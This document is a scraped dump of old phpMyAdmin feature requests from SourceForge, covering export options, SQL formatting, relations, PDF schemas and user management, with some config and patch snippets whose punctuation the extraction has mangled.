Original URL https sourceforge.net p phpmyadmin feature requests 347 https sourceforge.net p phpmyadmin feature requests 347 Original author chipnowacek","enhancement"
"24444","5047","Creation updation date removal.. Hello phpMyAdmin developers.
I have been using phpMyAdmin for 2 years now.
And I have enjoyed using it.
Recently when I upgraded to 2.5.1, I noticed you guys added a nice feature which lists the creation updation check date for each table.
I also noticed you put this feature information in the SQL dumps.
When I sync two databases, I usually do a compare on two SQL dump files convieniently generated by phpMyAdmin.
The creation updation check date time inclusion ruins the comparision for me.
May I ask that you provide a way to turn off this feature?
maybe a config file option, maybe a checkbox on the dump page).
Thank you so much!
Original URL https sourceforge.net p phpmyadmin feature requests 348 https sourceforge.net p phpmyadmin feature requests 348 Original author amanpatel","enhancement"
"24444","5048","cfg[ OBGzip ] = FALSE; be default.
cfg[ OBGzip ] = TRUE; Is set by default but limits compatibility to the majority considerably.
A stable configuration is best for defaults.
An informed sysadmin should enable it actively.
This will help the newbies out alot too!
cfg[ OBGzip ] = FALSE; would be better Original URL https sourceforge.net p phpmyadmin feature requests 349 https sourceforge.net p phpmyadmin feature requests 349 Original author memeyou","enhancement"
"24444","5049","Option to disable all SQL formatting.
Currently, phpMyAdmin parses and rewrites every single SQL query before executing it Keywords are converted to upper case, whitespace and line breaks are inserted.
This even happens when cfg[ SQP ][ fmtType ] is set to none .
SQL formatting and pretty printing might be nice features for SQL newbies.
But I know what I m doing.
And I know better than phpMyAdmin how I want to write my SQL, where I want to insert line breaks, etc.
I d really like to have an option in config.inc.php that lets me disable all SQL formatting and pretty printing.
Original URL https sourceforge.net p phpmyadmin feature requests 350 https sourceforge.net p phpmyadmin feature requests 350 Original author mfichtner","enhancement"
"24444","5050","Deep relational linking on Insert screen.
I d like to see the relational links on the Insert page, and possibly in the relational popups.
I have a database where I ve put all text elements into a separate text table to simplify i18n.
The tables that have links to the text table also link to one another.
Of course, the logical element to show when entering data is the name field.
But that is a link to the text table so all I see is number.
As an example objects.content > contents.id contents.name > text.id contents field to display name text field to display data In the drop down for objects.content I d like to see the text.data related to contents.name rather than the text.
id which is relatively meaningless) Thanks, Michael Original URL https sourceforge.net p phpmyadmin feature requests 352 https sourceforge.net p phpmyadmin feature requests 352 Original author redbeardc","enhancement"
"24444","5051","Display output of multiple SQL commands.
The short form is that when I enter one SQL command in the windows below the tables say SELECT), when I execute it, I see the results.
If I put two commands in that window I do not see the results of each command.
I am interfacing to an external program which can generate anywhere from 50 to 1000 mySQL UPDATE commands to change prices on our web data base.
Each UPDATE command affects only one item in the DB.
So I need to see the results of each UPDATE and I dont need the script to blow before it gets to the end.
Just execute and tell me what didn t work and I will fix the ones that didnt work.
At www.networkshosting.com I had this ability and thought it would be a pretty normal thing to have.
I have tried on two different WSP s to get resolution without results.
Please tell me you have an answer to this rather simple need.
As one of my computer science professors used to tell me, an ugly program that works is infinitely better that a pretty one that doesn t. Keep in touch at rpierce47 sbcglobal.net R Pierce Dallas Original URL https sourceforge.net p phpmyadmin feature requests 351 https sourceforge.net p phpmyadmin feature requests 351 Original author anonymous","enhancement"
"24444","5052","Abbreviated content for relation dropdowns.
Some of my relation fields to display contain lengthy text elements.
This makes the dropdowns on the insert screen rather wide.
I d like to see the option to abbreviate them in a manner similar to the browse screen.
Thanks, Michael Original URL https sourceforge.net p phpmyadmin feature requests 353 https sourceforge.net p phpmyadmin feature requests 353 Original author redbeardc","enhancement"
"24444","5053","PDF schema sort options.
I d like to see an assignable sort order for the table list.
I see three useful possibilities 1\.
Sort on table name I ve patched mine to do this) 2\.
Sort on table organization e.g.
ORDER BY x, y or ORDER BY y,x 3\.
Sort by database order current) It requires adding a simple ORDER BY statement at the end of the page query assignment in pdf pages.php.
All I ve done to mine is add .
ORDER BY table name at the end of the page query assignment.
This may not be the correct way I m not very familiar with the PMA infrastructure) but it works.
This could be selectable on the page retained between submissions) and settable as a default.
Also, I d like to see the Display PDF Button state maintained between submissions for changes to the layout, possibly even between sessions or at least a default that can be changed).
For instance, I typically shut off Data Dictionary when I m working on the layout.
Thanks for the great product, Michael Original URL https sourceforge.net p phpmyadmin feature requests 354 https sourceforge.net p phpmyadmin feature requests 354 Original author redbeardc","enhancement"
"24444","5054","Auto Completion of SQL.
In virtually every Unix shell you can hit tab to complete a filename.
That is an simple yet extremely powerfull feature.
I think phpMyAdmin needs such a thing, where you can hit Tab in the SQL query input, and it completes table and column names.
Maybe even My)SQL keywords.
1337!
Original URL https sourceforge.net p phpmyadmin feature requests 356 https sourceforge.net p phpmyadmin feature requests 356 Original author capm","enhancement"
"24444","5055","Show index information in the data dictionary.
I d like to see an option to display index information in the data dictionary.
Since a column can be part of many indices, this may have to be displayed separately from the table information.
It may not be necessary to display the cardinality of the index since this can change so frequently.
Original URL https sourceforge.net p phpmyadmin feature requests 355 https sourceforge.net p phpmyadmin feature requests 355 Original author newshb","enhancement"
"24444","5056","Insert data from textfile page.
I tried to insert data from local file and got SQL query LOAD DATA LOCAL INFILE C \\Temp\\phpBA.tmp INTO TABLE `new resource` FIELDS TERMINATED BY ; ENCLOSED BY amp;quot; ESCAPED BY \\ LINES TERMINATED BY \r\n MySQL said The used command is not allowed with this MySQL version Back Then I tried simply LOAD DATA without LOCAL and everything was OK.
I think default parameter should be set on LOAD in LOAD mehtod in Insert data from a textfile into table window.
Second, I think the Insert data from a textfile into table window could be changed a little, because it is very inconvenient to add Column names if you are loading data from text file to only some of a table s columns.
It would be easyer to see all columns selected and to tick a check box near it.
The same idea is implemented in Mysql Front.
I think you got the point.
I am adding a picture of MysqlFront data import dialog, where you can see column selection.
Original URL https sourceforge.net p phpmyadmin feature requests 357 https sourceforge.net p phpmyadmin feature requests 357 Original author sandy2000","enhancement"
"24444","5057","cfg[ PropertiesIconic ] both .
when I set cfg[ PropertiesIconic ] to both ,text isn t shown in strChange and strDrop below table properties ... to show the text edit tbl properties structure.php on lines 383 and 388 old .
amp;lt;img src= amp;quot;.
images button edit.png amp;quot; title= amp;quot; .
strChange .
amp;quot; alt= amp;quot; .
strChange .
amp;quot; width= amp;quot;12 amp;quot; height= amp;quot;13 amp;quot; amp;gt; .
amp;quot;\n amp;quot; edited .
amp;lt;img src= amp;quot;.
images button edit.png amp;quot; title= amp;quot; .
strChange .
amp;quot; alt= amp;quot; .
strChange .
amp;quot; width= amp;quot;12 amp;quot; height= amp;quot;13 amp;quot; amp;gt; .
cfg[ PropertiesIconic ] === both ) ?
.
strChange ) .
amp;quot;\n amp;quot; Original URL https sourceforge.net p phpmyadmin feature requests 358 https sourceforge.net p phpmyadmin feature requests 358 Original author jenix","enhancement"
"24444","5058","Add DISTINCT checkbox to SELECT page.
For the amp;quot;Select amp;quot; tab, there should be a checkbox toggling amp;quot;DISTINCT amp;quot; to the query.
It s not even currently possible to insert manually, since the manual arbitrary field is inserted in the WHERE clause.
Original URL https sourceforge.net p phpmyadmin feature requests 361 https sourceforge.net p phpmyadmin feature requests 361 Original author anonymous","enhancement"
"24444","5059","Add optimize DB option.
Currently you can optimize a particualr table, although there are many times like after doing lots of data clean up) you d want to optimize all the tables.
If we simply had a link on the main DB page with like amp;quot;Data Dictionary amp;quot;.. that would run optimze on all the tables.
Original URL https sourceforge.net p phpmyadmin feature requests 362 https sourceforge.net p phpmyadmin feature requests 362 Original author khenriks","enhancement"
"24444","5060","data export within a query result.
Hi, I often need to extract some few record of table not the whole table).
Currently, I m counting the rank of the record in the query result, and i m using the standart export tools for the table extract n rows from the rank x).
It would be useful to have a check box on each row, that allow to select which row we want the sql Insert generated.
or CSV or else if the query use more than one table) Paquerette.
Original URL https sourceforge.net p phpmyadmin feature requests 359 https sourceforge.net p phpmyadmin feature requests 359 Original author paquerette","enhancement"
"24444","5061","Add slow query log with EXPLAIN links.
MySQL can be enabled to log slow queries.
If slow query logging is on phpMyAdmin could list the slow queries and provide links to run EXPLAIN on them.
This would allow admins to anaylize the slow queries and look for possible ways to prevent them in the future.
Currently this is something that can be done manully by inspecting the log file and copy pasting the SQL into a mysql prompt or into phpMyAdmin.
Adding this direct ability to check slow queries from the web would be a nice fetaure.
Original URL https sourceforge.net p phpmyadmin feature requests 363 https sourceforge.net p phpmyadmin feature requests 363 Original author khenriks","enhancement"
"24444","5062","Icon Usage.
I am currently using version 2.5.3 rc2 from cvs and like the look of the new icon layout.
The only problem is that the icons are really small and as such could benefit from some padding around them so the user doesn t accidently click one they didn t want.
For example, if you want to click on amp;quot;Change amp;quot; for a field, you can very, very easily click on amp;quot;Drop amp;quot; instead as firstly they are next to each other, and secondly because there is hardly any gap between the two.
I would even suggest that putting those two functions next to each other is not good UI design practise.
The main reasoning behind this is because the change button is probably clicked on the most out of all of the buttons there.
Putting drop next to change is only asking for trouble particularly as they have very different outcomes.
Would be nice if there was an icon toolbar at the top as well instead of all those big boxes to save room, but that s another matter.
Original URL https sourceforge.net p phpmyadmin feature requests 360 https sourceforge.net p phpmyadmin feature requests 360 Original author mrsmiley18","enhancement"
"24444","5063","Rename a database.
Maybe it s possible to add a amp;quot;rename database amp;quot; as you have a amp;quot;rename table amp;quot;?
rename database = rename the dir on the unix shell)...
Original URL https sourceforge.net p phpmyadmin feature requests 364 https sourceforge.net p phpmyadmin feature requests 364 Original author anonymous","enhancement"
"24444","5064","Check Get Latest Version.
It would be great if there were an option in say the home page so you could check what the latest version of pma was available.
Would also be great if you were able to install that version as well through the application, or at least download it at a bare minimum.
The install feature should only be available to users of the highest access so that shared host pma users cannot upgrade the version that they are using and disrupt the other users on the same host.
An idea may be to activate its use through the config file, or even have the installer as a command line script rather than through the interface.
Then only users with shell access to pma would be able to upgrade it automatically.
One prerequisite for the installer would be that the config file settings are preserved.
Original URL https sourceforge.net p phpmyadmin feature requests 365 https sourceforge.net p phpmyadmin feature requests 365 Original author mrsmiley18","enhancement"
"24444","5065","g b)zipped export of large sql dumps.
http www.phpmyadmin.net documentation faq sec.3.2) describes a known limitation of zipped sql dump export due to in memory compression.
This is pretty bad because especially those big dumps are worthwhile compressing and not everybody has shell access to reproduce the manual mysqldump zip workaround.
Original URL https sourceforge.net p phpmyadmin feature requests 366 https sourceforge.net p phpmyadmin feature requests 366 Original author cp6","enhancement"
"24444","5066","Mininum password length.
Hi Users are allowed to change their mysql passwords through phpmyadmin if enabled in config file) but I would like to set minimum length for new password.
MySQL itself doesn t set length restrictions for passwords but administrators could enforce users to use longer password for security reasons.
There could be parameter in config file for password lengths cfg[ PasswordLength ] = 8 only passwords amp;gt;= 8 characters are allowed, 1 = no length restriction Teemu Original URL https sourceforge.net p phpmyadmin feature requests 370 https sourceforge.net p phpmyadmin feature requests 370 Original author kuulasma","enhancement"
"24444","5067","Tabular data editing.
It would be great, if phpMyAdmin could support editing table data in a tabular way excel like).
If I am not mistaken, right now, I only can edit one record at a time.
Being able to edit a whole bunch without having to go back and forth between the amp;quot;viewing amp;quot; and amp;quot;editing amp;quot; screens could strongly speed up more complicated editing tasks.
Original URL https sourceforge.net p phpmyadmin feature requests 367 https sourceforge.net p phpmyadmin feature requests 367 Original author mrehker","enhancement"
"24444","5068","Browsing paging by value of ordered field.
When you are viewing the records of a table and when using an order by, like when clicking on a field name, it would be nice to see the first and last field value at the top so that when navigating the results list, it s easy to know where you re at.
Something like what they do in telephone books.
This would make it easier when navigating large lists and you re looking for a specific piece of data or alphabetical group.
Original URL https sourceforge.net p phpmyadmin feature requests 371 https sourceforge.net p phpmyadmin feature requests 371 Original author anonymous","enhancement"
"24444","5069","Mobile Web Browser Version.
Generate pages for use on the new generation of cell phone that use amp;quot;mini browsers amp;quot;.
i.e.
no graphics, reduced display size, etc.)
Would be awesome to do some basic administration from my cell phone.
I don t know what the amp;quot;standard amp;quot; screen size is for these devices, but 320x240 pixels is a pretty good starting point.
Would like to be able to accomplish the high level admin type stuff remotely in a pinch.
i.e.
flush privledges, add a new user, server status, backup tables to remote addresses, not the phone), restore tables from remote or local addresses), start, stop, restart, etc.
Don t necessarily need to edit rows for non mysql table when working at this higher level.
Original URL https sourceforge.net p phpmyadmin feature requests 368 https sourceforge.net p phpmyadmin feature requests 368 Original author anonymous","enhancement"
"24444","5070","Reload left frame for server databases.php.
When i set cfg[ DefaultTabServer ] = server databases.php ;, run PMA in browser, click on some DB, all in main frame is ok, but ... left frame nothing chenge S ... can you reload left frame to show selected DB ???
thanks for ReAction jenik Original URL https sourceforge.net p phpmyadmin feature requests 373 https sourceforge.net p phpmyadmin feature requests 373 Original author jenix","enhancement"
"24444","5071","renaming tables.
Hi, I know I should rename tables via sql statement RENAME x TO y, but it would be great to have rename link on main DB page with others table related actions.
btw thank you for your hard work, I use phpMyAdmin everyday Original URL https sourceforge.net p phpmyadmin feature requests 369 https sourceforge.net p phpmyadmin feature requests 369 Original author hondzik","enhancement"
"24444","5072","Bookmarks for all users.
Hi I found out that bookmarked saved) query is available only for the user who bookmarked the query In PMA bookmark table bookmarked queries are assigned for the user).
Would it be possible to bookmark queries so that they would be available for all users.
By selecting checkbox new checkbox next to bookmark field) user would be able to bookmark the query for all users not only for him her self.
So all users who has privileges to execute queries on the database table would be able to execute bookmarker queries.
Teemu Original URL https sourceforge.net p phpmyadmin feature requests 372 https sourceforge.net p phpmyadmin feature requests 372 Original author kuulasma","enhancement"
"24444","5073","SQL query enable to show the result directly in print view.
In 2.5.3, when you enter a sql query you have to show the query result first and in the result view you can click amp;quot;print view amp;quot; to show the print view.
I d love to have an option labeled amp;quot;print view amp;quot; beside the sql query so that the result is shown directly in the print view.
Original URL https sourceforge.net p phpmyadmin feature requests 374 https sourceforge.net p phpmyadmin feature requests 374 Original author linuxsmiley","enhancement"
"24444","5074","phpMyAdmin as PEAR package.
Would you like to publish your class library and application on the page amp;quot;http pear.php.net packages.php?catpid=7 amp;amp;catname=Database amp;quot; as a new package?
Original URL https sourceforge.net p phpmyadmin feature requests 375 https sourceforge.net p phpmyadmin feature requests 375 Original author elfring","enhancement"
"24444","5075","Export to VML SVG.
1\.
Do you use VML or SVG files for the icons and diagrams in the user interface?
http www.w3.org Graphics SVG Overview.htm8 http www.xml.com pub a 2003 07 16 svg prescod.html http www.adobe.com svg demos main.html http www.adobe.com svg community external.html http nokiko.com svg links.asp?ID=12 http www.kevlindev.com samples index.htm http www.w3.org TR NOTE VML http www.toxicorp.com vml links.html 2\.
Would you like to export any charts to these file formats?
3\.
How do you think about to let the users choose them in a amp;quot;theme amp;quot; or amp;quot;skin amp;quot;?
Original URL https sourceforge.net p phpmyadmin feature requests 376 https sourceforge.net p phpmyadmin feature requests 376 Original author elfring","enhancement"
"24444","5076","XForms The Next Generation of Web Forms.
Would you like to support a XForms GUI?
http www.w3.org MarkUp Forms http www.w3.org TR css3 ui Original URL https sourceforge.net p phpmyadmin feature requests 377 https sourceforge.net p phpmyadmin feature requests 377 Original author elfring","enhancement"
"24444","5077","edit link in sql history.
can you, please, add link amp;quot;edit amp;quot; in sql history for each query) to edit text in textarea, without execute query ???
use javascript to save data traffic ) ...
Original URL https sourceforge.net p phpmyadmin feature requests 378 https sourceforge.net p phpmyadmin feature requests 378 Original author jenix","enhancement"
"24444","5078","Detect that php max execution time is reached.
It would be nice if we could detect, that max execution time will be reached and return user useful message instead of php error.
My idea is to get time and max execution time on start and check periodically if we are not too close 10 seconds?)
to max execution time.
Original URL https sourceforge.net p phpmyadmin feature requests 379 https sourceforge.net p phpmyadmin feature requests 379 Original author nijel","enhancement"
"24444","5079","Split the structure db panel.
I have a lot of tables in my db, more than 100.
So when i need to add a new table, I see the whole structure and it takes a lot a time to download even with a local server) I think pdf option, print format, docSQL should be on another panel named options or operations Original URL https sourceforge.net p phpmyadmin feature requests 380 https sourceforge.net p phpmyadmin feature requests 380 Original author mdelorme","enhancement"
"24444","5080","Remember options chosen last time..
I think that all options should be stored in session variables or cookies so that fields such as the display PDF schema options Show grid, Show color etc) and in the Insert page, if you set it to amp;quot;insert another row amp;quot; after it has performed it s query, the next page should have amp;quot;insert another row amp;quot; already selected.
So if you go on an inserting spree it will make it that little bit easier.
Original URL https sourceforge.net p phpmyadmin feature requests 381 https sourceforge.net p phpmyadmin feature requests 381 Original author anonymous","enhancement"
"24444","5081","Add all tables to PDF page.
It would be handy to have a button in the PDF page manager that adds all tables to the PDF page.
Then we can just go through and edit the coordinates.
Original URL https sourceforge.net p phpmyadmin feature requests 382 https sourceforge.net p phpmyadmin feature requests 382 Original author anonymous","enhancement"
"24444","5082","Copy database.
I would like to see a copy database just like in table amp;gt; operations.
A rename option would be nice also.
Original URL https sourceforge.net p phpmyadmin feature requests 383 https sourceforge.net p phpmyadmin feature requests 383 Original author anonymous","enhancement"
"24444","5083","Delete several entries in browselist.
It would be nice to delete several entries of a result set at once, instead of clicking for each entry on the link delete .
Instead of using links to delete entries there should be a checkbox, similar to structure view, so we can check several entries and delete them all by clicking on a button called delete .
I can imagine to expand this also on edit , in such a manner that we can edit several entries at once,...
Original URL https sourceforge.net p phpmyadmin feature requests 384 https sourceforge.net p phpmyadmin feature requests 384 Original author clumsy","enhancement"
"24444","5084","Make docSQL optional.
Please consider making a variable in config.inc.php to tell db details structure.php whether it should display the docSQL utility.
Thanks!
Original URL https sourceforge.net p phpmyadmin feature requests 385 https sourceforge.net p phpmyadmin feature requests 385 Original author boerm","enhancement"
"24444","5085","Icons for index table.
replace the Action Text Links with Icons for Indexes in tbl properties structure.php3 like it is for the Table View cause not in all languages edit and drop are as short as in english!
Original URL https sourceforge.net p phpmyadmin feature requests 386 https sourceforge.net p phpmyadmin feature requests 386 Original author cybot tm","enhancement"
"24444","5086","Users organized by category.
What would be cool is if you had a table specific to phpmyadmin in the mysql database for catagories so when you browse your users it organize s the users by catagory.
Same thing for database s. That way I can organize the databases by amp;quot;My DataBases amp;quot;, amp;quot;Dads Databases amp;quot;, amp;quot;Blah s Databases amp;quot;.
Or organize the users by amp;quot;Personal amp;quot; then amp;quot;Buisness amp;quot;.
That would be one of the coolest things.
And maybe an option in the config to either have the data bases in seperate drop downs per catagory or have some sort of seperator in the drop down for the catagory if seperator is selected then it selects the first user in the catagory).
Then for users it would just be some sort of heading.
Original URL https sourceforge.net p phpmyadmin feature requests 387 https sourceforge.net p phpmyadmin feature requests 387 Original author anonymous","enhancement"
"24444","5087","Simplified host config [needs feedback].
simplified mysql host config defcfg = cfg[ Servers ][0]; unset c); c = defcfg; cfg[ Servers ][ i] = amp;amp; c; c[ host ] = localhost ; i = 1; i ; cfg[ Servers ][ i][ host ] = localhost ; MySQL hostname or IP address cfg[ Servers ][ i][ port ] = mydefaultport ; MySQL port leave blank for default port cfg[ Servers ][ i][ socket ] = ; Path to the socket leave blank for default socket ...... ....... defcfg = cfg[ Servers ][0]; unset c); c = defcfg; cfg[ Servers ][ i] = amp;amp; c; c[ host ] = localhost ; you only need to modify base on the default config this make amp;quot;CVS up amp;quot; never confilct unset c); c = defcfg; cfg[ Servers ][ i] = amp;amp; c; c[ host ] = localhost ; unset c); c = defcfg; cfg[ Servers ][ i] = amp;amp; c; c[ host ] = localhost ; cfg[ ServerDefault ] = 1; Default server 0 = no default server) cfg[ Server ] = ; unset cfg[ Servers ][0]); unset defcfg); Original URL https sourceforge.net p phpmyadmin feature requests 388 https sourceforge.net p phpmyadmin feature requests 388 Original author anonymous","enhancement"
"24444","5088","Default to persistent connections?.
Hi, Why is cfg[ PersistentConnections ] false instead of true in the default config?
I think it should be true.
Original URL https sourceforge.net p phpmyadmin feature requests 389 https sourceforge.net p phpmyadmin feature requests 389 Original author olafvdspek","enhancement"
"24444","5089","Not Documented User pma is controluser .
I m a new user, setting up a phpMyAdmin server, and I didn t see anything mentioned in the documentation regarding WHERE to put the user information for the phpmyadmin database for the PHP tables).
Through trial and error, I figured out that it was controluser and controlpass even though they re documented in the config file as amp;quot;MySQL control user settings this user must have read only access to the amp;quot;mysql user amp;quot; and amp;quot;mysql db amp;quot; tables) amp;quot; Now that I ve set it up, and reviewed these documentation locations, I see that it is mentioned in passing.
As someone searching for a amp;quot;OK, I ve created the pma user for the phpmyadmin database, but where the heck do I put the username and password!
amp;quot; section of the documentation, I was completely lost.
You could make it clearer in the amp;quot; cfg[ Servers ][ i][ controluser ] string amp;quot; and or amp;quot; cfg[ Servers ][ i][ pmadb ] string amp;quot; configuration documentation.
You could update the comment in the config.inc file this user is also used for accessing amp;lt;pmadb amp;gt; used to store the PMA tables).
You could mention it in the create tables.sql file.
Tell the admin to add a user called amp;quot;pma amp;quot; with a random password, and then put amp;quot;pma amp;quot; and that password in the controluser controlpass settings of config.inc.
Original URL https sourceforge.net p phpmyadmin feature requests 390 https sourceforge.net p phpmyadmin feature requests 390 Original author tomcollins","enhancement"
"24444","5090","Show count of rows.
Why there is no number of rows in the amp;quot;show table definition amp;quot; page?
Regards, Thomas Original URL https sourceforge.net p phpmyadmin feature requests 391 https sourceforge.net p phpmyadmin feature requests 391 Original author tomys","enhancement"
"24444","5091","Make default functions configurable.
The default function is NOW ) on the first timestamp field unfortunately is behaivour is not always desirable.
It would be cool if one could configure phpMyAdmin to select default functions or not.
Well, at least I would find it cool. )
Original URL https sourceforge.net p phpmyadmin feature requests 392 https sourceforge.net p phpmyadmin feature requests 392 Original author englert","enhancement"
"24444","5092","Categories.
Sorry, I don t speak english really good and don t really know how to call my feature request, so I ll try to explain it to you.
The problem is that you get only one mysql database at some webspace providers like 1 amp;amp;1 Puretec in Germany.
I have about 5 different projects running on this databse, and so in this databse are ATM 60 tables.
Because of the fact that all tables have a certain prefix, for exmaple amp;quot;phpbb amp;quot; for tables regarding to the phpBB Forum or amp;quot;edel amp;quot; for another project, it would be nice to get the ability to create groups for the tables so for exmaple a group called amp;quot;phpBB amp;quot;, which holds all tables beginning with amp;quot;phpbb amp;quot; and so on.
you would only see the names of the groups with a amp;quot; amp;quot; in front of it, so that you d have to click on a group to show the tables regarding to it.
this feature would, IMHO, add a lot of comfort to phpMyAdmin.
Greetings, Fabian Schlenz, mail fabianonline.de Original URL https sourceforge.net p phpmyadmin feature requests 393 https sourceforge.net p phpmyadmin feature requests 393 Original author anonymous","enhancement"
"24444","5093","Enum values field size too small.
The size of the field for editing ENUM values is too small, especially when you have more than 5 choices.
Please lengthen the text field to accomodate longer entries.
Thanks!
Original URL https sourceforge.net p phpmyadmin feature requests 394 https sourceforge.net p phpmyadmin feature requests 394 Original author anonymous","enhancement"
"24444","5094","Compatible with PEAR Horde Some other extensions group.
To be honest, this isn t necessary and it d probably demand a ton of rewriting.
That being said, it s natural for new PHP users to check out the extensions available via PEAR, Horde, or name your favorite site).
Personally, the first place I went when I started looking for extensions was PEAR.
If the goal of this program is to help new users learn MySQL, then it makes sense to upload the source to one of these major extension depositories.
Let them help expose phpMyAdmin to other people looking for help with databases.
Original URL https sourceforge.net p phpmyadmin feature requests 395 https sourceforge.net p phpmyadmin feature requests 395 Original author anonymous","enhancement"
"24444","5095","Defining relationships.
The method for defining relationships within phpMyAdmin is to start at the MANY of a ONE to MANY relationship and to link the foreign key of MANY many.fk) to the usually) primary key of ONE one.pk).
This has the disadvantage that a foreign key field can only be linked to a single foreign table.
In my long experience of designing, building and using databases I quite often come across the situation where a foreign key field can be linked to more than one foreign table.
In all the database administration tools I have used to date the method for defining relationships starts at the ONE and not the MANY table.
The method is as follows a) Choose a table as the ONE in a ONE to MANY relationship.
b) Create a relationship entry a table can have any number of these).
c) Choose the unique key this is usually the primary key but may be a candidate key but not an index).
d) Choose the MANY table in this relationship.
e) For each field within the unique key of ONE note that unique keys may contain several fields) identify the corresponding foreign key field within MANY.
I would really like to enter relationships in this way.
Original URL https sourceforge.net p phpmyadmin feature requests 396 https sourceforge.net p phpmyadmin feature requests 396 Original author tonymarston","enhancement"
"24444","5096","Palm Pocket PC?.
Would it be possible for a version of phpmyadmin to fit the size of the internet explorers in pocket sized devices?
Perhaps even a WAP version?
Original URL https sourceforge.net p phpmyadmin feature requests 397 https sourceforge.net p phpmyadmin feature requests 397 Original author anonymous","enhancement"
"24444","5097","Relationship on a different server.
Hi, i have an external database with less space and an internal database.
on the internal server, i have installed phpmyadmin and the connection to the external system works fine.
the problem is the external less space.
the relations database is very usefull, but uses some space.
there should be an option in the configuration file, so that i can tell phpmyadmin that the relation database is stored not on the external, but on the internal system.
best i can setup a server with username password where this information is stored.
regards, michael Original URL https sourceforge.net p phpmyadmin feature requests 398 https sourceforge.net p phpmyadmin feature requests 398 Original author misi67","enhancement"
"24444","5098","Overview of tables with overhead.
For making administration easier on bigger mysql databases, it would be nice to have an overview page with all tables that have overhead.
And ofcourse it would make it more easier to have to possibility to clear the overhead on a table on that page or to clear the overhead for all tables at once.
Original URL https sourceforge.net p phpmyadmin feature requests 399 https sourceforge.net p phpmyadmin feature requests 399 Original author nielsvdc","enhancement"
"24444","5099","lt; lt; Next | Previous gt; gt;.
Hi, How about next and previous buttons while editing a record?
A new radion button which allows you to move to the next record after updating.
This would make editing multiple records so much easier.
Selected records could also be edited by using checkboxes, similar to the new feature of deleting multiple rows in browse.
Steven Browett.
stebrowett hotmail.com) Original URL https sourceforge.net p phpmyadmin feature requests 401 https sourceforge.net p phpmyadmin feature requests 401 Original author anonymous","enhancement"
"24444","5100","request for amp;quot;default db amp;quot;.
[ amp;quot;only db amp;quot;] = array a , b , c ); [ default db ] = b ; thanks Original URL https sourceforge.net p phpmyadmin feature requests 400 https sourceforge.net p phpmyadmin feature requests 400 Original author xuefer","enhancement"
"24444","5101","Lookup for enum fields.
I have produced a somewhat relational database using mysql.
It would be great if I could dynamically populate enum fields with data from other related tables, as the data in the amp;quot;lookup amp;quot; tables is augmented from time to time.
As of now, the enum and set datatypes do seem to be able to take static lists of variables, but they cannot be dynamically populated.
Stephen Bourne Original URL https sourceforge.net p phpmyadmin feature requests 403 https sourceforge.net p phpmyadmin feature requests 403 Original author anonymous","enhancement"
"24444","5102","request for new config for servers.
server defaults = array .... = amp;gt; ... , .... ); i = 0; i ; cfg[ Servers ][ i] = server defaults; copy c = amp;amp; cfg[ Servers ][ i]; reference c[ ... ] = ... ; i ; cfg[ Servers ][ i] = server defaults; copy c = amp;amp; cfg[ Servers ][ i]; reference c[ ... ] = ... ; Move same configure between servers into server defaults.this make upgrading configing easy also this help reducing confict when doing amp;quot;cvs up amp;quot; because adding removing some keys don t require to modify server 1 2 3 4..., only server defaults Original URL https sourceforge.net p phpmyadmin feature requests 402 https sourceforge.net p phpmyadmin feature requests 402 Original author xuefer","enhancement"
"24444","5103","Auto detect PmaAbsoluteUri with www Sharp.Runtime.
I am Viatcheslav V. Vassiliev e mail support www sharp.com www Sharp.Runtime http www sharp.com runtime ) is in process web server asynchronous protocol handler) that works with IE5.5 .
With www Sharp.Runtime it is possible to access phpMyAdmin without standalone web server with URL like amp;quot;php phpMyAdmin amp;quot;.
Custom protocol in example, amp;quot;php amp;quot;) could not be currently detected automatically.
To do this, change in libraries common.lib.php should be done lines cfg[ PmaAbsoluteUri ]= !empty HTTPS) amp;amp; amp;amp; strtolower HTTPS) != off ) ?
https http ) .
.
HTTP HOST; should be changed to if isset \{ SERVER ARRAY\}[ HTTP SCHEME ])) \{ HTTP SCHEME = \{ SERVER ARRAY\} [ HTTP SCHEME ]; \} if !empty HTTP SCHEME)) \{ cfg[ PmaAbsoluteUri ] = HTTP SCHEME.
.
HTTP HOST; \} else \{ cfg[ PmaAbsoluteUri ] = !empty HTTPS) amp;amp; amp;amp; strtolower HTTPS) != off ) ?
https http ) .
.
HTTP HOST; \} Because HTTP SCHEME server variable is not defined in Apache IIS this will not affect phpMyAdmin for those web servers.
Sincerely yours, Viatcheslav V. Vassiliev Original URL https sourceforge.net p phpmyadmin feature requests 404 https sourceforge.net p phpmyadmin feature requests 404 Original author anonymous","enhancement"
"24444","5104","Relations) Multiple merged foreign keys.
If you have a linked table where there can be multiple entries, then you cannot actually link the two tables together if you want to add more than one id the dropdown list is a single entry type.
Instead could SET fields pointing at another table have a multiple choice list that you can select from keeping in mind that the SET values might not include all entries from the target table).
Original URL https sourceforge.net p phpmyadmin feature requests 406 https sourceforge.net p phpmyadmin feature requests 406 Original author rycochet","enhancement"
"24444","5105","Show content of foreign keys in print view.
Doing some nasty inter relationships I need to keep a printout of each table next to me so I can check that the index id used is actually the right one when other ppl fill in the fields) would be nice if there was an option so that when browsing the tables linked tables could resolve and display the actual display field as well as the index field used as when inserting editing).
Oh and would be nice for print output at the least as that s what you tend to pass on to your manager ; ) Original URL https sourceforge.net p phpmyadmin feature requests 405 https sourceforge.net p phpmyadmin feature requests 405 Original author rycochet","enhancement"
"24444","5106","Improved Primary Foreign key integrity.
The PHP myadmin system seems to manage its own seperate set of relations ; these are not the enforced integrity constraints on the database but seem to be just a set of design notes that allow browsing of data through non enforced relationships.
They bear no relationship to primary foreign key relations in the actual databases.
I suggest now that innodb table types support foreign key constraints, allowing the management of primary foreign key relationships IN the database.
There is no apparent visibility of foreign keys at all.
This is an important aspect of relational databases in general and should be supported by such as great tool as pma! )
The current relations system is confusing it should be made clearer that these are just a set of pointers for pma users and do not exist in the database itself!
just want to say apart from the relations functionality ; ) ) what a great tool pma is, hat off to the project team!
James Bush.
james.bush tns group.com Original URL https sourceforge.net p phpmyadmin feature requests 407 https sourceforge.net p phpmyadmin feature requests 407 Original author anonymous","enhancement"
"24444","5107","List of databases when none is selected.
When none database is selected, there is lotxc2xb4s of space below the select menu.
There should be a list of databases, so you dont need to select the database from list always.
[select menu] Choose a database database1 database2 ...
Original URL https sourceforge.net p phpmyadmin feature requests 408 https sourceforge.net p phpmyadmin feature requests 408 Original author anonymous","enhancement"
"24444","5108","Export a user s privileges.
I think it would be pretty useful if one could export a user just like it is possible to export structures and data.
That function would generate a set of SQL GRANT statements to create a user with the exact same set of user, database, table, and column privileges.
